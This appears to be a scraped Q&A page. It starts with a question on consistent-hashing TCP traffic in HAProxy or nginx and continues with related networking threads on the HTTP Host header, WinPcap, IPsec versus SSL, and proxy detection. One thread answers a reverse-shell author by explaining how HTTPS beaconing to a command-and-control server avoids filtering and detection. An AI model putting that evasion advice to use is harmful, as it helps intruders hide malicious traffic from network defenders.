I have a scenario where I need to route TCP traffic to a dynamic set of backend servers (Kubernetes pods to be exact but we can ignore that for purposes of this post) through a proxy like HAProxy or nginx. The traffic needs to be routed based on a key (call it the routing_key) provided by the client in the TCP payload.
I see that both nginx and HAProxy support consistent hashing. However, from what I can tell based on HAProxy's manual (see "balance" section), there's no way to perform consistent hashing based on a TCP payload. Payload-based load balancing seems to be limited to L7 HTTP parameters like Header and URI params. This post outlines a method for statically balancing based on string matching a TCP payload, but my case is more dynamic so a true consistent hashing approach is much preferred.
Nginx appears to offer a bit more flexibility in that you can set the hashing value to an arbitrary variable as shown here. This appears to work for both L7 (the "backend" stanza) and L4 (the "stream" stanza). However, I'm a bit hazy on what you are and aren't allowed to do for variables. Does anyone have an example of setting a variable to be a value extracted from the TCP payload and using that for consistent hashing?
Final bonus question: the routing_key value is actually an AES-GCM encrypted value. The proxy server would have access to the key used to decrypt this value. Is it possible to have nginx grab the routing key value from the TCP payload, decrypt it using the known key, and then use that for consistent hashing? Would that involve creating an nginscript module?
In the HAProxy 2.1 can you use aes_gcm_dec(...) in combination with req.payload(...) for such a requirement.
My idea, untested.
listen tcp-in
bind :443 ssl cert
tcp-request inspect-delay 10s
tcp-request session set-var(sess.routingkey) req.payload(0,500)
# for consistent hashing try this
hash-type consistent wt6
use_backend %[var(sess.routingkey),aes_gcm_dec(128,txn.nonce,Zm9vb2Zvb29mb29wZm9vbw==,txn.aead_tag)]
Here are also the links to the html Documentation.
aes_gcm_dec
req.payload
hash-type consistent ... is described at hash-type
Related
I had made a multiclient TCP reverse shell and saw a course video which said HTTP reverse shells are better because how its difficult to trace back to the attacker compared to TCP . I didn't understand it .
I have tried googling this question with not much help .
Are HTTP reverse shells actually beneficial over TCP ? How ?
I personally think having HTTP reverse shell is bad since http is connectionless , when the attacker wants to communicate with the host , it can't since there is no connection to it and attacker can only communicate if a request (like GET) comes from the host. Am I missing anything here ?
Please explain....
First, I am just going to answer for HTTPS over HTTP because I don't see much reason to use HTTP over HTTPS, but there are a lot of benefits to encrypting your traffic this way.
It's unlikely to be auto-filtered
Many networks will block outbound traffic other than a few special ports. So, using something like port 6666 is likely to set off a few alerts. If you try to use a port for something other than it's intended use, some software can use deep packet inspection (DPI) to detect/block this. In other words, if your payload tries to use port 80/443 without using HTTP/HTTPS, it may raise an alert and get your payload caught.
It's stealthier.
I would say two of the most important factors to being a stealthy payload are looking like normal traffic so as to avoid attracting attention in the first place and to be difficult to inspect if attention does come to your connection. HTTPS accomplishes both of these rather well.
This is because on most networks, it is extremely common to see nodes on your network making requests to the internet all the time. Compare a beaconing payload making HTTPS requests to some payload connecting over some random port.
Now, as far as your question at the end... it depends on your situation, but you are right that there will often be a delay if you use something like HTTP(S) over maintaining an established connection. I alluded to this earlier, but we are able to communicate through beaconing. Essentially, that just means that the payload will check back with the server on a set interval (often with a jitter to make it a little harder to detect).
The victim will make an HTTP(S) request to your command and control (C2) server that contains the results of the previous command you told it to run. Your server will return an HTTP(S) response that contains the next instructions for the payload.
Last week I started quite a fuss in my Computer Networks class over the need for a mandatory Host clause in the header of HTTP 1.1 GET messages.
The reason I'm provided with, be it written on the Web or shouted at me by my classmates, is always the same: the need to support virtual hosting. However, and I'll try to be as clear as possible, this does not appear to make sense.
I understand that in order to allow two domains to be hosted in a single machine (and by consequence, share the same IP address), there has to exist a way of differentiating both domain names.
What I don't understand is why it isn't possible to achieve this without a Host clause (HTTP 1.0 style) by using an absolute URL (e.g. GET http://www.example.org/index.html) instead of a relative one (e.g. GET /index.html).
When the HTTP message got to the server, it (the server) would redirect the message to the appropriate host, not by looking at the Host clause but, instead, by looking at the hostname in the URL present in the message's request line.
I would be very grateful if any of you hardcore hackers could help me understand what exactly am I missing here.
This was discussed in this thread:
modest suggestions for HTTP/2.0 with their rationale.
Add a header to the client request that indicates the hostname and
port of the URL which the client is accessing.
Rationale: One of the most requested features from commercial server
maintainers is the ability to run a single server on a single port
and have it respond with different top level pages depending on the
hostname in the URL.
Making an absolute request URI required (because there's no way for the client to know on beforehand whether the server homes one or more sites) was suggested:
Re the first proposal, to incorporate the hostname somewhere. This
would be cleanest put into the URL itself :-
GET http://hostname/fred http/2.0
This is the syntax for proxy redirects.
To which this argument was made:
Since there will be a mix of clients, some supporting host name reporting
and some not, it just doesn't matter how this info gets to the server.
Since it doesn't matter, the easier to implement solution is a new HTTP
request header field. It allows all clients and servers to operate as they
do now with NO code changes. Clients and servers that actually need host
name information can have tiny mods made to send the extra header field
containing the URL and process it.
[...]
All I'm suggesting is that there is a better way to
implement the delivery of host name info to the server that doesn't involve
hacking the request syntax and can be backwards compatible with ALL clients
and servers.
Feel free to read on to discover the final decision yourself. But be warned, it's easy to get lost in there.
The reason for adding support for specifying a host in an HTTP request was the limited supply of IP addresses (which was not an issue yet when HTTP 1.0 came out).
If your question is "why specify the host in a Host header as opposed to on the Request-Line", the answer is the need for interopability between HTTP/1.0 and 1.1.
If the question is "why is the Host header mandatory", this has to do with the desire to speed up the transition away from assigned IP addresses.
Here's some background on the Internet address conservation with respect to HTTP/1.1.
The reason for the 'Host' header is to make explicit which host this request refers to. Without 'Host', the server must know ahead of time that it is supposed to route 'http://joesdogs.com/' to Joe's Dogs while it is supposed to route 'http://joscats.com/' to Jo's Cats even though they are on the same webserver. (What if a server has 2 names, like 'joscats.com' and 'joescats.com' that should refer to the same website?)
Having an explicit 'Host' header make these kinds of decisions much easier to program.
I want to develop an application where all traffic from network segment gets mirrored onto a windows station in order to be able to see all tcp-ip request/response data (filtering).
I know that it should be possible using WinPcap to capture all packets but problem in this case would be that I would have to implement all the processing needed to be able to distinguish tcp data streams (e.g. handshaking, closing, retransmissions, reordering, maybe others ?). I need the stream of data because I will be doing application level (e.g. http) filtering.
I wonder if there is a driver/solution somewhere that provides me tcp data stream, solution that could be used on a gateway machine or using port mirroring.
For starters, in WinPCap, you can define something called filter.
That filter filters out all the traffic except the type that you specify, so if you want to capture HTTP traffic only, I'd suggest you make a filter on TCP Port 80 or any other port you're using for HTTP.
Once you've captured these packets, you can check the payload of the TCP, parse the HTTP header and do whatever you wish according to your system's policy.
Check this link if you want to familiarize yourself with how to use WinPCap and how to use filters(in this example they're capturing TCP traffic in general, you should add to their filter "port 80").
just a very general question, but can somebody tell me when I use openSSL and
when IPSEC to secure data transfer over the internet? It seems both of them
are doing the same, only at different levels of the network protocol. So
I am not absolutely sure why we need both of them.
Cheers for your help
Yes, different levels of the network protocol. One is implemented in the OS and the other in an application.
So the reason that both are needed:
IPSEC can secure all traffic including that from applications that don't use encryption. But, both sides must use an OS that supports IPSEC and must be configured by the system administrator.
SSL can secure the traffic for one application. It does not need to use a particular OS and it does not need administrator access permissions to configure it.
You are getting it all wrong buddy...IPSEC is required for a secure communication between two machines.
Like you want to send a packet to other machine but you want that no one could possibly even determine what protocol you are using (tcp/udp.. etc) then you use this IPSEC. and it is not all over there is so much to explore about IPSEC.
openssl is you can say just a encrytion/authentication functions library.
A clear difference could be understood wh a little example.
Suppose you want to secure traffic between two machines so you create secure encrypted packet , send it to other machine there it needs to be decrypted based on security associations.All this is part of IPSEC Protocol.
While when encrypting the packet on your sending machine you may have used some C/Linux functions to encrypt the packet.This is where openssl comes in place.
Similarly on the other end when you will capture the packet and extract the required part then you can decrypt it using openssl function used on your machine.
I tried explaining it with my best ... hope it helped !!! If still you have any doubt do clear !!!
IPSec is based on a configuration file that runs in the background and encrypts all the data between two machines. This encryption is based on IP pairs, an initiator and a responder (at least that's the configuration they use at my workplace, which more or less conforms to the standards). ALL the IP traffic between the two machines is then encrypted. Neither the type nor the content of the traffic is shown. It has its own encapsulation that encapsulates the WHOLE packet (including all the headers that the packet previously had). The packet is then decapsulated (if that's a word) at the other end to get a fully formed packet (not just the payload). The encryption might be using the encryption provided by SSL (e.g. OpenSSL).
SSL, on the other hand, encrypts the data and then you can do what ever you want with it. You can put it on a USB and then give it to someone or just keep it encrypted locally to prevent data theft or send it over the internet or a network (in which case the packet itself won't be encrypted, only the payload, which will be encrypted by SSL).
Is it possible to detect if an incoming request is being made through a proxy server? If a web application "bans" users via IP address, they could bypass this by using a proxy server. That is just one reason to block these requests. How can this be achieved?
IMHO there's no 100% reliable way to achieve this but the presence of any of the following headers is a strong indication that the request was routed from a proxy server:
via:
forwarded:
x-forwarded-for:
client-ip:
You could also look for the proxy or pxy in the client domain name.
If a proxy server is setup properly to avoid the detection of proxy servers, you won't be able to tell.
Most proxy servers supply headers as others mention, but those are not present on proxies meant to completely hide the user.
You will need to employ several detection methods, such as cookies, proxy header detection, and perhaps IP heuristics to detect such situations. Check out http://www.osix.net/modules/article/?id=765 for some information on this situation. Also consider using a proxy blacklist - they are published by many organizations.
However, nothing is 100% certain. You can employ the above tactics to avoid most simple situations, but at the end of the day it's merely a series of packets forming a TCP/IP transaction, and the TCP/IP protocol was not developed with today's ideas on security, authentication, etc.
Keep in mind that many corporations deploy company wide proxies for various reasons, and if you simply block proxies as a general rule you necessarily limit your audience, and that may not always be desirable. However, these proxies usually announce themselves with the appropriate headers - you may end up blocking legitimate users, rather than users who are good at hiding themselves.
-Adam
Did a bit of digging on this after my domain got hosted up on Google's AppSpot.com with nice hardcore porn ads injected into it (thanks Google).
Taking a leaf from this htaccess idea I'm doing the following, which seems to be working. I added a specific rule for AppSpot which injects a HTTP_X_APPENGINE_COUNTRY ServerVariable.
Dim varys As New List(Of String)
varys.Add("VIA")
varys.Add("FORWARDED")
varys.Add("USERAGENT_VIA")
varys.Add("X_FORWARDED_FOR")
varys.Add("PROXY_CONNECTION")
varys.Add("XPROXY_CONNECTION")
varys.Add("HTTP_PC_REMOTE_ADDR")
varys.Add("HTTP_CLIENT_IP")
varys.Add("HTTP_X_APPENGINE_COUNTRY")
For Each vary As String In varys
If Not String.IsNullOrEmpty(HttpContext.Current.Request.Headers(vary)) Then HttpContext.Current.Response.Redirect("http://www.your-real-domain.com")
Next
You can look for these headers in the Request Object and accordingly decide whether request is via a proxy/not
1) Via
2) X-Forwarded-For
note that this is not a 100% sure shot trick, depends upon whether these proxy servers choose to add above headers.